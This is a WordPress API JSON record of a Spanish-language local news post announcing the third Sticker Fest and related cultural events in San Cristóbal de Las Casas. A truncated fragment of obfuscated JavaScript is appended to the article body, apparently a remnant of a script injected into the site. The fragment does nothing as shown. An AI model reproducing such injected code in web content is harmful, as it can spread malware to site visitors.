{"id":5366,"date":"2022-09-24T02:37:21","date_gmt":"2022-09-24T02:37:21","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5366"},"modified":"2022-09-24T02:37:22","modified_gmt":"2022-09-24T02:37:22","slug":"este-sabado-tercer-sticker-fest-en-sclc","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5366","title":{"rendered":"Este s\u00e1bado tercer Sticker Fest en SCLC"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-23-at-5.10.21-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-5367\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-23-at-5.10.21-PM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-23-at-5.10.21-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-23-at-5.10.21-PM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-23-at-5.10.21-PM-1536x1152.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-23-at-5.10.21-PM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- Por tercera ocasi\u00f3n se realiza en esta ciudad el Sticker Fest, donde m\u00e1s de 20 ilustradores y artistas van a exponer su trabajo, lo cual ha tenido mucho auge en los \u00faltimos a\u00f1os, por lo que este fin de semana los interesados pueden acudir a apreciar este arte adhesivo. Al respecto, Carolina Ben\u00edtez Becerra, directora del Centro Cultural de El Carmen, inform\u00f3 que se exhibir\u00e1n calcoman\u00edas (sticker) realizadas por artistas coletos, \u201cesta actividad ha tenido mucha relevancia en los \u00faltimos meses, ya que es de f\u00e1cil reproducci\u00f3n y los productos son bastante econ\u00f3micos. Mencion\u00f3 que cada autor presenta diversas ilustraciones y estilos desde su presentaci\u00f3n y tama\u00f1o. \u201cSon alrededor de 20 los expositores, la mayor\u00eda originarios de San Crist\u00f3bal de Las Casas, pero tambi\u00e9n hay personas de otros lugares del pa\u00eds que se han sumado a esta actividad\u201d. \u201cEste proyecto es una iniciativa de Guillermo y Sof\u00eda Mena, que nace con la intenci\u00f3n de promover la propuesta visual de San Crist\u00f3bal de Las Casas, creando un espacio de vinculaci\u00f3n entre artistas y comunidad local\u201d.  Asimismo, inform\u00f3 del conversatorio con Edrei Gonz\u00e1lez Hern\u00e1ndez, dentro de la programaci\u00f3n del Jard\u00edn del Arte. \u201cEste s\u00e1bado, es el conversatorio con Edrei Gonz\u00e1lez Hern\u00e1ndez, sobre el proyecto Tejedora de Alas. Donde se abordar\u00e1 el tema de transformaci\u00f3n del duelo a trav\u00e9s del arte\u201d. \u201cPosteriormente, dar\u00e1 inicio el taller \u201cTejer la ausencia\u201d de Zoraida Vlees, sobre cartas textiles, por lo que est\u00e1n todos invitados este fin de semana a la variedad de actividades que tenemos programadas en el Centro Cultural del Carmen\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- Por tercera ocasi\u00f3n se realiza en esta ciudad el Sticker Fest, donde m\u00e1s de 20 ilustradores y artistas van a exponer su trabajo, lo cual ha tenido mucho auge en los \u00faltimos a\u00f1os, por lo que este fin de semana los interesados pueden acudir a apreciar este arte &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5367,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-5366","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5366","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5366"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5366\/revisions"}],"predecessor-version":[{"id":5368,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5366\/revisions\/5368"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5367"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5366"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5366"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5366"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}